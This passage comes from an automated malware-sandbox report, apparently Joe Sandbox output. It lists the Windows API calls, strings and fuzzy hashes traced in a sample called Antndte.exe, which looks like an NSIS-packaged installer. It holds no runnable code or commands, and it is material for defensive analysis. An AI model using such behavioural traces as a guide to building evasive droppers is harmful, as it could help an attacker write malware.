                                                                                                                                • CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405D9A
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: File$AttributesCreate
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 415043291-0
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                • CreateDirectoryW.KERNELBASE(?,00000000,00403366,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76D63420,004035BF,?,00000006,00000008,0000000A), ref: 00405838
                                                                                                                                • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 00405846
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CreateDirectoryErrorLast
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1375471231-0
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                • MoveFileW.KERNEL32(00000000,00000000), ref: 00401696
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: FileMove
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3562171763-0
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 0040233D
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: PrivateProfileStringWrite
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 390214022-0
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402CE8,00000000,?,?), ref: 00406146
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Create
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2289755597-0
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                • SearchPathW.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 00401749
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: PathSearch
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2203818243-0
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,004032DE,000000FF,00416A00,?,00416A00,?,?,00000004,00000000), ref: 00405E3A
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: FileWrite
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3934441357-0
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,00403328,00000000,00000000,0040314C,?,00000004,00000000,00000000,00000000), ref: 00405E0B
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: FileRead
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2738559852-0
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                • VirtualProtect.KERNELBASE(1000405C,00000004,00000040,1000404C), ref: 100027E0
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.10001049251.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_10000000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 544645111-0
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 00402379
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: PrivateProfileString
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1096422788-0
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,?,?,?,0040617D,?,00000000,?,?,Call,?), ref: 00406113
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Open
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 71445658-0
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                • SendMessageW.USER32(000103CC,00000000,00000000,00000000), ref: 00404275
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3850602802-0
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                • SendMessageW.USER32(00000028,?,?,00404077), ref: 0040425A
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3850602802-0
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                • SetFilePointer.KERNELBASE(?,00000000,00000000,00403088,?,?,00000006,00000008,0000000A), ref: 00403339
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: FilePointer
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 973152223-0
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                • ShellExecuteExW.SHELL32(?), ref: 004058B9
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ExecuteShell
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 587946157-0
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                • KiUserCallbackDispatcher.NTDLL(?,00404010), ref: 00404243
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CallbackDispatcherUser
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2492992576-0
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 004052E6: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsm118D.tmp\System.dll,00000000,0041C000,76D623A0,?,?,?,?,?,?,?,?,?,0040325E,00000000,?), ref: 0040531E
                                                                                                                                  • Part of subcall function 004052E6: lstrlenW.KERNEL32(0040325E,Skipped: C:\Users\user\AppData\Local\Temp\nsm118D.tmp\System.dll,00000000,0041C000,76D623A0,?,?,?,?,?,?,?,?,?,0040325E,00000000), ref: 0040532E
                                                                                                                                  • Part of subcall function 004052E6: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsm118D.tmp\System.dll,0040325E), ref: 00405341
                                                                                                                                  • Part of subcall function 004052E6: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsm118D.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsm118D.tmp\System.dll), ref: 00405353
                                                                                                                                  • Part of subcall function 004052E6: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405379
                                                                                                                                  • Part of subcall function 004052E6: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405393
                                                                                                                                  • Part of subcall function 004052E6: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A1
                                                                                                                                  • Part of subcall function 00405867: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430250,Error launching installer), ref: 00405890
                                                                                                                                  • Part of subcall function 00405867: CloseHandle.KERNEL32(?), ref: 0040589D
                                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401F47
                                                                                                                                  • Part of subcall function 0040670D: WaitForSingleObject.KERNEL32(?,00000064), ref: 0040671E
                                                                                                                                  • Part of subcall function 0040670D: GetExitCodeProcess.KERNEL32(?,?), ref: 00406740
                                                                                                                                  • Part of subcall function 004061C9: wsprintfW.USER32 ref: 004061D6
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2972824698-0
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                • Sleep.KERNELBASE(00000000), ref: 004014EA
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Sleep
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3472027048-0
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                • GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.10001049251.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_10000000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AllocGlobal
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3761449716-0
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                • GetDlgItem.USER32(?,000003F9), ref: 00404C7A
                                                                                                                                • GetDlgItem.USER32(?,00000408), ref: 00404C85
                                                                                                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 00404CCF
                                                                                                                                • LoadBitmapW.USER32(0000006E), ref: 00404CE2
                                                                                                                                • SetWindowLongW.USER32(?,000000FC,0040525A), ref: 00404CFB
                                                                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D0F
                                                                                                                                • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404D21
                                                                                                                                • SendMessageW.USER32(?,00001109,00000002), ref: 00404D37
                                                                                                                                • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404D43
                                                                                                                                • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404D55
                                                                                                                                • DeleteObject.GDI32(00000000), ref: 00404D58
                                                                                                                                • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404D83
                                                                                                                                • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404D8F
                                                                                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E25
                                                                                                                                • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404E50
                                                                                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E64
                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00404E93
                                                                                                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404EA1
                                                                                                                                • ShowWindow.USER32(?,00000005), ref: 00404EB2
                                                                                                                                • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404FAF
                                                                                                                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00405014
                                                                                                                                • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405029
                                                                                                                                • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 0040504D
                                                                                                                                • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 0040506D
                                                                                                                                • ImageList_Destroy.COMCTL32(?), ref: 00405082
                                                                                                                                • GlobalFree.KERNEL32(?), ref: 00405092
                                                                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0040510B
                                                                                                                                • SendMessageW.USER32(?,00001102,?,?), ref: 004051B4
                                                                                                                                • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004051C3
                                                                                                                                • InvalidateRect.USER32(?,00000000,?), ref: 004051E3
                                                                                                                                • ShowWindow.USER32(?,00000000), ref: 00405231
                                                                                                                                • GetDlgItem.USER32(?,000003FE), ref: 0040523C
                                                                                                                                • ShowWindow.USER32(00000000), ref: 00405243
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                • String ID: $M$N
                                                                                                                                • API String ID: 1638840714-813528018
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                • GetDlgItem.USER32(?,000003FB), ref: 00404735
                                                                                                                                • SetWindowTextW.USER32(00000000,?), ref: 0040475F
                                                                                                                                • SHBrowseForFolderW.SHELL32(?), ref: 00404810
                                                                                                                                • CoTaskMemFree.OLE32(00000000), ref: 0040481B
                                                                                                                                • lstrcmpiW.KERNEL32(Call,0042D248,00000000,?,?), ref: 0040484D
                                                                                                                                • lstrcatW.KERNEL32(?,Call), ref: 00404859
                                                                                                                                • SetDlgItemTextW.USER32(?,000003FB,?), ref: 0040486B
                                                                                                                                  • Part of subcall function 004058C8: GetDlgItemTextW.USER32(?,?,00000400,004048A2), ref: 004058DB
                                                                                                                                  • Part of subcall function 00406516: CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Antndte.exe",0040334E,C:\Users\user\AppData\Local\Temp\,76D63420,004035BF,?,00000006,00000008,0000000A), ref: 00406579
                                                                                                                                  • Part of subcall function 00406516: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 00406588
                                                                                                                                  • Part of subcall function 00406516: CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Antndte.exe",0040334E,C:\Users\user\AppData\Local\Temp\,76D63420,004035BF,?,00000006,00000008,0000000A), ref: 0040658D
                                                                                                                                  • Part of subcall function 00406516: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Antndte.exe",0040334E,C:\Users\user\AppData\Local\Temp\,76D63420,004035BF,?,00000006,00000008,0000000A), ref: 004065A0
                                                                                                                                • GetDiskFreeSpaceW.KERNEL32(0042B218,?,?,0000040F,?,0042B218,0042B218,?,?,0042B218,?,?,000003FB,?), ref: 0040492E
                                                                                                                                • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404949
                                                                                                                                  • Part of subcall function 00404AA2: lstrlenW.KERNEL32(0042D248,0042D248,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B43
                                                                                                                                  • Part of subcall function 00404AA2: wsprintfW.USER32 ref: 00404B4C
                                                                                                                                  • Part of subcall function 00404AA2: SetDlgItemTextW.USER32(?,0042D248), ref: 00404B5F
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                • String ID: A$C:\Users\user\AppData\Local\Temp\Undige$Call
                                                                                                                                • API String ID: 2624150263-221836030
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.9986518374.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                • Associated: 00000000.00000002.9986589917.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                • Associated: 00000000.00000002.9986626526.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                • Associated: 00000000.00000002.9986626526.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                • Associated: 00000000.00000002.9986908780.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: p!C$p!C
                                                                                                                                • API String ID: 0-3125587631
                                                                                                                                • Opcode ID: b391703ce6aa9d184f83615265780e2503839b4fa6daee6685a5ac04655da8ea
                                                                                                                                • Instruction ID: ef217add9e462a39eaf01b2cd615f348b30b4b8a27c4232395f9688b09cd85c2
                                                                                                                                • Opcode Fuzzy Hash: b391703ce6aa9d184f83615265780e2503839b4fa6daee6685a5ac04655da8ea
                                                                                                                                • Instruction Fuzzy Hash: 33C15831E04219DBDF18CF68C8905EEBBB2BF88314F25826AD85677380D734A942CF95
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 5a4ae33423394c5bea169515a796ff1213356ce6b05ba1201df3d6212e3a5333
                                                                                                                                • Instruction ID: c2d777d08f91faa28cc29f4af1d325e94f95b1c5ec16d27d51274fd7273dd8ba
                                                                                                                                • Opcode Fuzzy Hash: 5a4ae33423394c5bea169515a796ff1213356ce6b05ba1201df3d6212e3a5333
                                                                                                                                • Instruction Fuzzy Hash: A4E18971A04709DFDB24CF59C880BAAB7F1EB44305F15852EE497AB2D1D778AA91CF04
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                • CheckDlgButton.USER32(?,-0000040A,?), ref: 00404452
                                                                                                                                • GetDlgItem.USER32(?,000003E8), ref: 00404466
                                                                                                                                • SendMessageW.USER32(00000000,0000045B,?,00000000), ref: 00404483
                                                                                                                                • GetSysColor.USER32(?), ref: 00404494
                                                                                                                                • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004044A2
                                                                                                                                • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004044B0
                                                                                                                                • lstrlenW.KERNEL32(?), ref: 004044B5
                                                                                                                                • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004044C2
                                                                                                                                • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004044D7
                                                                                                                                • GetDlgItem.USER32(?,0000040A), ref: 00404530
                                                                                                                                • SendMessageW.USER32(00000000), ref: 00404537
                                                                                                                                • GetDlgItem.USER32(?,000003E8), ref: 00404562
                                                                                                                                • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004045A5
                                                                                                                                • LoadCursorW.USER32(00000000,00007F02), ref: 004045B3
                                                                                                                                • SetCursor.USER32(00000000), ref: 004045B6
                                                                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 004045CF
                                                                                                                                • SetCursor.USER32(00000000), ref: 004045D2
                                                                                                                                • SendMessageW.USER32(00000111,?,00000000), ref: 00404601
                                                                                                                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404613
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                                                • String ID: +C@$Call$N
                                                                                                                                • API String ID: 3103080414-3697844480
                                                                                                                                • Opcode ID: 9a2d0ca3c2f6281e852f2d8aeca5f3bca76ad293f1c4d3c8d798300b4eb97cdc
                                                                                                                                • Instruction ID: 544d3524579c470af9434eda2f0c3a81960274dfcdaaec18bef3a5beb83851d9
                                                                                                                                • Opcode Fuzzy Hash: 9a2d0ca3c2f6281e852f2d8aeca5f3bca76ad293f1c4d3c8d798300b4eb97cdc
                                                                                                                                • Instruction Fuzzy Hash: 0C6192B1A00209BFDB109F60DD85AAA7B79FB84345F00843AF605B72D0D779A951CFA8
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                                • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                                • SetBkMode.GDI32(00000000,?), ref: 00401126
                                                                                                                                • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                • DrawTextW.USER32(00000000,coleoptera Setup,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Similarity
                                                                                                                                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                • String ID: F$coleoptera Setup
                                                                                                                                • API String ID: 941294808-2531181823
                                                                                                                                • Opcode ID: e215112caf94b1f54c3d659d29471f2010c28c8ad64a223ce82802b434a3cd12
                                                                                                                                • Instruction ID: 68187ad06c86d7515f13608b457f8be07a0117cb3bcf177897c910b083aea3f1
                                                                                                                                • Opcode Fuzzy Hash: e215112caf94b1f54c3d659d29471f2010c28c8ad64a223ce82802b434a3cd12
                                                                                                                                • Instruction Fuzzy Hash: 9A418C71800209AFCF058F95DE459AF7BB9FF44315F00842AF591AA1A0C778EA54DFA4
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000000,?,?,00406069,?,?), ref: 00405F09
                                                                                                                                • GetShortPathNameW.KERNEL32(?,004308E8,00000400), ref: 00405F12
                                                                                                                                  • Part of subcall function 00405CD9: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FC2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CE9
                                                                                                                                  • Part of subcall function 00405CD9: lstrlenA.KERNEL32(00000000,?,00000000,00405FC2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D1B
                                                                                                                                • GetShortPathNameW.KERNEL32(?,004310E8,00000400), ref: 00405F2F
                                                                                                                                • wsprintfA.USER32 ref: 00405F4D
                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,004310E8,C0000000,00000004,004310E8,?,?,?,?,?), ref: 00405F88
                                                                                                                                • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405F97
                                                                                                                                • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FCF
